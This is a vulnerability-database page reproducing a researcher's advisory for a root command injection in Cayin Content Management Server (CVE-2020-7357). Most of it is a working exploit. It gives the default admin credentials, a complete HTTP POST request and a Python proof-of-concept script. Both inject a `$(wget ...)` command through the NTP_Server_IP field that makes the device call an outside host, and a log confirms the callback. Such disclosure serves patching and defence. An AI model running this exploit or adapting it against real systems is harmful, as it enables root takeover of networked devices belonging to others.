Vulners
Lucene search
Cayin Content Management Server 11.0 Root Remote Command Injection
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Cayin CMS NTP Server 11.0 CVE-2020-7357 - Remote Code Execution | 21 Jun 202009:10 | – | 0daydb |
| Code Blocks 17.12 - Local Buffer Overflow | 21 Jun 202009:07 | – | 0daydb |
| Trend Micro Web Security - Remote Code Execution | 24 Jun 202008:21 | – | 0daydb |
 | Cayin CMS NTP Server 11.0 Remote Code Execution Exploit | 18 Jun 202000:00 | – | zdt |
 | CVE-2020-7357 | 6 Apr 202000:00 | – | attackerkb |
 | CVE-2020-7357 | 18 Jun 202015:43 | – | circl |
 | Code Execution Vulnerability in CAYIN Technology CMS | 19 Jun 202000:00 | – | cnvd |
 | Cayin CMS Command Injection (CVE-2020-7357) | 28 Nov 202000:00 | – | checkpoint_advisories |
 | CVE-2020-7357 | 6 Aug 202015:45 | – | cve |
 | CVE-2020-7357 Cayin CMS Command Injection | 6 Aug 202015:45 | – | cvelist |
10
<html><body><p>Cayin Content Management Server 11.0 Root Remote Command Injection
Vendor: CAYIN Technology Co., Ltd.
Product web page: https://www.cayintech.com
Affected version: CMS-SE v11.0 Build 19179
CMS-SE v11.0 Build 19025
CMS-SE v11.0 Build 18325
CMS Station (CMS-SE-LXC)
CMS-60 v11.0 Build 19025
CMS-40 v9.0 Build 14197
CMS-40 v9.0 Build 14099
CMS-40 v9.0 Build 14093
CMS-20 v9.0 Build 14197
CMS-20 v9.0 Build 14092
CMS v8.2 Build 12199
CMS v8.0 Build 11175
CMS v7.5 Build 11175
Summary: CAYIN Technology provides Digital Signage
solutions, including media players, servers, and
software designed for the DOOH (Digital Out-of-home)
networks. We develop industrial-grade digital signage
appliances and tailored services so you don't have
to do the hard work.
Desc: CAYIN CMS suffers from an authenticated OS
semi-blind command injection vulnerability using
default credentials. This can be exploited to inject
and execute arbitrary shell commands as the root
user through the 'NTP_Server_IP' HTTP POST parameter
in system.cgi page.
Tested on: Apache/1.3.42 (Unix)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5570
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php
15.05.2020
---
Session created with default credentials (webadmin:bctvadmin).
HTTP POST Request:
-----------------
POST /cgi-bin/system.cgi HTTP/1.1
Host: 192.168.1.3
Content-Length: 201
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Smith
Origin: http://192.168.1.3
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.3/cgi-bin/system.cgi
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957
Connection: close
save_system: 1
system_date: 2020/5/16 06:36:48
TIMEZONE: 49
NTP_Service: 1
NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)
TEST_NTP: 測試
reboot1: 1
reboot_sel1: 4
reboot_sel2: 1
reboot_sel3: 1
font_list: ZH_TW
Request recorder @ ZSL:
-----------------------
Origin of HTTP request: 192.168.1.3:61347
HTTP GET request to vrfy.zeroscience.mk:
GET / HTTP/1.0
User-Agent: MyVoiceIsMyPassportVerifyMe
Host: vrfy.zeroscience.mk
Accept: */*
Connection: Keep-Alive
PoC script:
-----------
import requests
url = "http://192.168.1.3:80/cgi-bin/system.cgi"
cookies = {"cy_lang": "ZH_TW",
"cy_us": "67176fd7d3d05812008",
"cy_en": "c8bef8607e54c99059cc6a36da982f9c009",
"WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST",
"WEB_STR_SYSTEM": "SYSTEM_SETTING",
"cy_cgi_tp": "1591206269_15957"}
headers = {"Cache-Control": "max-age=0",
"Origin": "http://192.168.1.3",
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Smith",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": "http://192.168.1.3/cgi-bin/system.cgi",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"}
data = {"save_system": "1",
"system_date": "2020/5/16 06:36:48",
"TIMEZONE": "49",
"NTP_Service": "1",
"NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)", # `cmd` or &cmd&
"TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6",
"reboot1": "1",
"reboot_sel1": "4",
"reboot_sel2": "1",
"reboot_sel3": "1",
"font_list": "ZH_TW"}
requests.post(url, headers=headers, cookies=cookies, data=data)
</p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Jun 2020 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 29
CVSS 3.19.6 - 9.9
EPSS0.77162